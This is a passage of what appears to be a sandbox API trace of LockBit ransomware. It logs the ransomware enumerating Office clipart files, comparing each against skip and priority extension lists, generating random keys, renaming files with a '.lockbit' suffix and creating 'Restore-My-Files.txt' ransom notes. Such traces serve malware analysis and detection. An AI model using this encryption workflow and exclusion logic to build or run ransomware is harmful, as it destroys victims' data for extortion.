DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241781.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241781.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.972] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.972] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0153.973] free (_Block=0x1fa2ed8) [0153.973] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241781.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.973] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.973] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.973] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x660f04f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x7938, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0250504.WMF", cAlternateFileName="")) returned 1 [0153.974] lstrcmpiW (lpString1=".", lpString2="J0250504.WMF") returned -1 [0153.974] lstrcmpiW (lpString1="..", lpString2="J0250504.WMF") returned -1 [0153.974] PathFindExtensionW (pszPath="J0250504.WMF") returned=".WMF" [0153.974] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.974] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.974] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.974] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.974] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.974] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.974] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.974] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.974] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.974] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.974] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.974] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.974] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.974] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.974] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.974] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.974] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.974] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.975] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.975] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.975] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.975] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.975] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.975] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.975] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.975] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.975] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.975] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.975] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.975] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.975] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.975] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.975] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.975] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.975] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.975] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.975] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.975] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.976] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.976] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.976] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.976] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.976] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.976] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.976] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.976] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.976] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.976] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0250504.WMF") returned 1 [0153.976] lstrcmpiW (lpString1="ntldr", lpString2="J0250504.WMF") returned 1 [0153.976] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0250504.WMF") returned 1 [0153.976] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0250504.WMF") returned -1 [0153.976] lstrcmpiW (lpString1="autorun.inf", lpString2="J0250504.WMF") returned -1 [0153.976] lstrcmpiW (lpString1="thumbs.db", lpString2="J0250504.WMF") returned 1 [0153.976] lstrcmpiW (lpString1="iconcache.db", lpString2="J0250504.WMF") returned -1 [0153.976] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.976] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0250504.WMF") returned=".WMF" [0153.976] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.976] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.976] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.977] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.977] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.977] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.977] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.977] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.977] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.977] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.977] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.977] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.977] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.977] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.977] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.977] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.977] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.977] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.977] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.977] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.977] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.977] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.978] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.978] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.978] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.978] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.978] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.978] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.978] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0250504.WMF.lockbit") returned 72 [0153.978] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0250504.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0250504.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0153.979] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.979] malloc (_Size=0x40068) returned 0x1ff1e60 [0153.979] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=31032) returned 1 [0153.979] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.980] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.980] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0153.980] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.981] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.981] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0153.981] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0153.989] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0250504.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0250504.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.989] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.989] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0153.990] free (_Block=0x1fa2ed8) [0153.990] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0250504.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.990] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.990] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.991] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x660f04f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x6958, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0250997.WMF", cAlternateFileName="")) returned 1 [0153.991] lstrcmpiW (lpString1=".", lpString2="J0250997.WMF") returned -1 [0153.991] lstrcmpiW (lpString1="..", lpString2="J0250997.WMF") returned -1 [0153.991] PathFindExtensionW (pszPath="J0250997.WMF") returned=".WMF" [0153.991] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.991] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.991] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.991] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.991] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.991] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.991] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.991] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.991] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.991] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.991] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.991] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.991] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.991] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.992] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.992] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.992] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.992] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.992] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.992] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.992] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.992] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.992] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.992] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.992] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.992] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.992] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.992] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.992] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.992] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.992] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.992] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.992] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.993] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.993] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.993] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.993] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.993] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.993] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.993] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.993] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.993] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.993] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.993] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.993] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.993] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.993] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.993] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0250997.WMF") returned 1 [0153.993] lstrcmpiW (lpString1="ntldr", lpString2="J0250997.WMF") returned 1 [0153.993] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0250997.WMF") returned 1 [0153.993] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0250997.WMF") returned -1 [0153.993] lstrcmpiW (lpString1="autorun.inf", lpString2="J0250997.WMF") returned -1 [0153.994] lstrcmpiW (lpString1="thumbs.db", lpString2="J0250997.WMF") returned 1 [0153.994] lstrcmpiW (lpString1="iconcache.db", lpString2="J0250997.WMF") returned -1 [0153.994] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.994] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0250997.WMF") returned=".WMF" [0153.994] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.994] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.994] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.994] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.994] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.994] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.994] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.994] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.994] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.994] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.994] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.994] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.994] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.994] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.994] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.994] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.995] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.995] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.995] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.995] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.995] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.995] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.995] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.995] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.995] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.995] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.995] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.995] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.995] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0250997.WMF.lockbit") returned 72 [0153.995] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0250997.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0250997.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0153.996] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.996] malloc (_Size=0x40068) returned 0x3e70008 [0153.996] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=26968) returned 1 [0153.996] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.997] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.997] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0153.997] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.997] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.997] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0153.997] ReadFile (in: hFile=0x2a8, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0154.003] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0250997.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0250997.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0154.003] malloc (_Size=0xa6) returned 0x1fa2ed8 [0154.003] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0154.004] free (_Block=0x1fa2ed8) [0154.005] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0250997.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0154.005] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0154.005] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0154.005] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x660f04f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1100c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0251007.WMF", cAlternateFileName="")) returned 1 [0154.005] lstrcmpiW (lpString1=".", lpString2="J0251007.WMF") returned -1 [0154.005] lstrcmpiW (lpString1="..", lpString2="J0251007.WMF") returned -1 [0154.005] PathFindExtensionW (pszPath="J0251007.WMF") returned=".WMF" [0154.005] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0154.005] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0154.005] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0154.005] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0154.005] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0154.005] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0154.005] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0154.005] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0154.005] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0154.006] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0154.006] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0154.006] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0154.006] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0154.006] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0154.006] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0154.006] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0154.006] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0154.006] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0154.006] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0154.006] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0154.006] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0154.006] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0154.006] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0154.006] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0154.006] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.006] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0154.006] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0154.006] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0154.007] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0154.007] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0154.007] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0154.007] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0154.007] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0154.007] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0154.007] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0154.007] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0154.007] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0154.007] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0154.007] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0154.007] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0154.007] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0154.007] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0154.007] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.007] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0154.007] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0154.007] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0154.008] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0154.008] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0251007.WMF") returned 1 [0154.008] lstrcmpiW (lpString1="ntldr", lpString2="J0251007.WMF") returned 1 [0154.008] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0251007.WMF") returned 1 [0154.008] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0251007.WMF") returned -1 [0154.008] lstrcmpiW (lpString1="autorun.inf", lpString2="J0251007.WMF") returned -1 [0154.008] lstrcmpiW (lpString1="thumbs.db", lpString2="J0251007.WMF") returned 1 [0154.008] lstrcmpiW (lpString1="iconcache.db", lpString2="J0251007.WMF") returned -1 [0154.008] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0154.008] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0251007.WMF") returned=".WMF" [0154.008] 